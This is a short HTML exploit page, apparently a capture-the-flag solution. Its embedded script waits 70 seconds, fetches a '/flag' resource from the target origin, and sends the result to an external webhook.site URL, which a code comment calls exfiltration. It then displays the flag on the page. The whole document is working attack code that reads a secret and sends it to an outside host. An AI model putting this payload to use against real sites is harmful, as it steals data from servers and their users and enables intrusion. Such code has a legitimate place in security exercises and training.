<!DOCTYPE html>
<html>
<head><title>Exploit</title></head>
<body>
<h1>Exploiting...</h1>
<script>
console.log('[*] Exploit loaded, waiting 70 seconds...');

setTimeout(() => {
    console.log('[*] Fetching /flag...');
    
    fetch('/flag')
        .then(response => response.text())
        .then(flag => {
            console.log('[+] FLAG:', flag);
            
            // Send to external webhook for exfiltration
            fetch('https://webhook.site/4bbf2a82-06bd-461e-a919-cb6170e6d163?flag=' + encodeURIComponent(flag), {
                mode: 'no-cors'
            });
            
            // Also display in page
            document.body.innerHTML = '<h1>FLAG: ' + flag + '</h1>';
        })
        .catch(err => {
            console.error('[-] Error:', err);
        });
}, 70000); // 70 seconds
</script>
</body>
</html>